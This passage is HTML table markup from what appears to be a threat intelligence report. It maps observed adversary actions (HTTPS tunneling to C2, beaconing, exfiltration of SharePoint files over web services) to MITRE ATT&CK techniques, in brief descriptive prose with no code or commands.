BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1480197581" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{109}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="587969922" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{1}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1572: Protocol Tunneling</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1159788097" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{8}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used a second-stage script to create an HTTPS tunnel directly to the C2 system.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="816422229" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{15}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="41" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1844477048" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{113}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="332418710" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{23}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1201: Traffic Signaling</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1964173556" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{30}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary communicated with external infrastructure using regular beaconing or other signaling patterns to maintain C2 or check in with their C2 server.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1227139708" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{37}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="42" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2059021150" paraeid="{fe88a42a-b491-4282-bf6b-4fa60552b1cb}{115}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Exfiltration</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1518739869" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{67}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1567.002: Exfiltration Over Web Service</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1226624978" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{74}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary accessed and exfiltrated internal data, specifically SharePoint files, via web-based channels.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1104406580" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{81}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="43" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1944173203" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{125}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1407495858" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{89}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal 